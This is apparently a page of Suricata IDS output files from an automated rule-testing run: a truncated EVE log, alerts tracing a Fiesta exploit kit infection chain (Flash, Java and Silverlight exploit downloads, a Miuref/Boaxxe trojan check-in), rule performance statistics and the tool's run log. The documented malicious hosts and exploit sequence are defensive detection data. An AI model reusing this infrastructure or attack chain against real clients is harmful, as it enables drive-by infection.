{"timestamp":"2014-12-08T23:18:43.821534+0000","flow_id":672801020296327,"pcap_cnt":312,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49252,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html","http_refer":"http:\/\/www.google.de\/url?url=http:\/\/www.excelforum.com\/&rct=j&frm=1&q=&esrc=s&sa=U&ei=yDGGVJmOOMv6UpregYgB&ved=0CCsQFjAD&usg=AFQjCNEaastQ4Jl1-R8Ba_-j6m7GMzl4dg","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":104065},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":104053,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.857836+0000","flow_id":1046892671846788,"pcap_cnt":357,"event_type":"http","src_ip":"192.168.204.137","src_port":49253,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/commercial_forum.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.871160+0000","flow_id":1598622023208298,"pcap_cnt":384,"event_type":"http","src_ip":"192.168.204.137","src_port":49257,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/yui\/connection\/connection-min.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.959788+0000","flow_id":2022260417416099,"pcap_cnt":386,"event_type":"http","src_ip":"192.168.204.137","src_port":49255,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ww

This file has been truncated. Go here to download in full.


suricata-4.0.0-etopen-all-alert-2018-11-16-T-14-57-21-11162018.1456-Variant2.pcap.txt - (6055 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
12/08/2014-23:18:49.997000  [**] [1:2019655:6] ET CURRENT_EVENTS Fiesta EK Landing Nov 05 2014 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49279
12/08/2014-23:18:50.744601  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49280 -> 205.234.186.111:80
12/08/2014-23:18:50.744601  [**] [1:2014726:110] ET POLICY Outdated Flash Version M1 [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.204.137:49280 -> 205.234.186.111:80
12/08/2014-23:18:50.744601  [**] [1:2019612:7] ET CURRENT_EVENTS Fiesta Flash Exploit URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49280 -> 205.234.186.111:80
12/08/2014-23:18:54.673292  [**] [1:2018411:2] ET CURRENT_EVENTS Fiesta Flash Exploit Download [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49280
12/08/2014-23:18:54.673292  [**] [1:2020981:3] ET CURRENT_EVENTS Fiesta EK Flash Exploit Apr 23 2015 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49280
12/08/2014-23:18:55.229241  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49282 -> 205.234.186.111:80
12/08/2014-23:18:55.250555  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49283 -> 205.234.186.111:80
12/08/2014-23:18:57.696333  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49284 -> 205.234.186.111:80
12/08/2014-23:19:00.049065  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49285 -> 205.234.186.111:80
12/08/2014-23:19:02.396437  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49286 -> 205.234.186.111:80
12/08/2014-23:19:04.936491  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49287 -> 205.234.186.111:80
12/08/2014-23:19:09.779789  [**] [1:2019683:6] ET TROJAN Miuref/Boaxxe Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49288 -> 209.239.112.229:80
12/08/2014-23:19:21.715674  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49289 -> 205.234.186.111:80
12/08/2014-23:19:24.107376  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49290 -> 205.234.186.111:80
12/08/2014-23:19:24.747148  [**] [1:2011582:52] ET POLICY Vulnerable Java Version 1.6.x Detected [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.204.137:49291 -> 205.234.186.111:80
12/08/2014-23:19:24.747148  [**] [1:2014912:6] ET CURRENT_EVENTS Unknown - Java Request  - gt 60char hex-ascii [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49291 -> 205.234.186.111:80
12/08/2014-23:19:25.000784  [**] [1:2014473:5] ET INFO JAVA - Java Archive Download By Vulnerable Client [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49291
12/08/2014-23:19:25.000784  [**] [1:2020983:3] ET CURRENT_EVENTS Fiesta EK Java Exploit Apr 23 2015 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49291
12/08/2014-23:19:25.000784  [**] [1:2017639:7] ET INFO JAR Size Under 30K Size - Potentially Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 205.234.186.111:80 -> 192.168.204.137:49291
12/08/2014-23:19:25.954909  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49292 -> 205.234.186.111:80
12/08/2014-23:19:25.954909  [**] [1:2011582:52] ET POLICY Vulnerable Java Version 1.6.x Detected [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.204.137:49292 -> 205.234.186.111:80
12/08/2014-23:19:25.954909  [**] [1:2014912:6] ET CURRENT_EVENTS Unknown - Java Request  - gt 60char hex-ascii [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49292 -> 205.234.186.111:80
12/08/2014-23:19:28.427266  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49293 -> 205.234.186.111:80
12/08/2014-23:19:28.427266  [**] [1:2014912:6] ET CURRENT_EVENTS Unknown - Java Request  - gt 60char hex-ascii [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49293 -> 205.234.186.111:80
12/08/2014-23:19:32.265978  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49294 -> 205.234.186.111:80
12/08/2014-23:19:34.697012  [**] [1:2018407:9] ET CURRENT_EVENTS Fiesta URI Struct [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.204.137:49295 -> 205.234.186.111:80
12/08/2014-23:24:27.901753  [**] [1:2018409:2] ET CURRENT_EVENTS Fiesta SilverLight Exploit Download [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49283
12/08/2014-23:24:27.901753  [**] [1:2020982:3] ET CURRENT_EVENTS Fiesta EK SilverLight Exploit Apr 23 2015 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 205.234.186.111:80 -> 192.168.204.137:49283


keyword_perf.log - (16014 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/16/2018 -- 14:57:21
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17008142        5269            5269            64251           3227.00         3227.00         0.00           
  threshold        26803           4               3               7666            6700.00         6854.00         6239.00        
  content          42832202        6299            3073            2495098         6799.00         6647.00         6944.00        
  pcre             23426830        1861            169             15630169        12588.00        5569.00         13289.00       
  byte_test        544206          167             70              10889           3258.00         3604.00         3009.00        
  byte_jump        15403           4               0               4859            3850.00         0.00            3850.00        
  isdataat         49008           15              1               7852            3267.00         2617.00         3313.00        
  flowbits         1392382         437             103             77370           3186.00         3159.00         3194.00        
  urilen           3075557         932             271             58769           3299.00         3365.00         3273.00        
  byte_extract     16809           1               1               16809           16809.00        16809.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17008142        5269            5269            64251           3227.00         3227.00         0.00           
  flowbits         1261546         403             69              77370           3130.00         2820.00         3194.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3028761         748             290             46914           4049.00         3984.00         4090.00        
  pcre             116511          32              0               13363           3640.00         0.00            3640.00        
  byte_test        514491          160             68              10889           3215.00         3532.00         2981.00        
  byte_jump        15403           4               0               4859            3850.00         0.00            3850.00        
  isdataat         46391           14              0               7852            3313.00         0.00            3313.00        
  byte_extract     16809           1               1               16809           16809.00        16809.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         130836          34              34              6355            3848.00         3848.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: threshold
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  threshold        26803           4               3               7666            6700.00         6854.00         6239.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2720324         703             257             39223           3869.00         4010.00         3788.00        
  pcre             18106580        573             35              15630169        31599.00        6486.00         33233.00       
  isdataat         2617            1               1               2617            2617.00         2617.00         0.00           
  urilen           3075557         932             271             58769           3299.00         3365.00         3273.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          168774          33              22              25169           5114.00         5513.00         4315.00        
  pcre             4501            1               1               4501            4501.00         4501.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          296263          99              0               7791            2992.00         0.00            2992.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          21659283        1333            367             421236          16248.00        20223.00        14738.00       
  pcre             4290961         1112            30              193636          3858.00         5044.00         3825.00        
  byte_test        22668           6               1               5069            3778.00         5069.00         3519.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4790184         1210            591             99687           3958.00         4277.00         3654.00        
  pcre             908277          143             103             27759           6351.00         5421.00         8746.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1228050         336             230             50729           3654.00         3872.00         3183.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          37823           11              11              3591            3438.00         3438.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept_enc
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          37721           11              11              3809            3429.00         3429.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_len
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  byte_test        7047            1               1               7047            7047.00         7047.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3461            1               1               3461            3461.00         3461.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_start
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          35526           11              11              3452            3229.00         3229.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          357095          116             101             4493            3078.00         3086.00         3022.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          8398571         1665            1159            2495098         5044.00         5853.00         3190.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          70366           22              22              3557            3198.00         3198.00         0.00           


IDSDeathBlossom.py.log - (1151 bytes) - download
1
2
3
4
5
6
7
8
2018-11-16 14:57:11,964 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-11-16 14:57:12,717 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-11-16 14:57:12,717 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2018-11-16 14:57:12,717 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-11-16 14:57:12,717 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-11-16 14:57:12,717 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/4c58c645061d62e63195d3f25b9611f1d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1456-Variant2.pcap -vvv -k none
2018-11-16 14:57:21,120 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-11-16 14:57:21,120 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 9.16506505013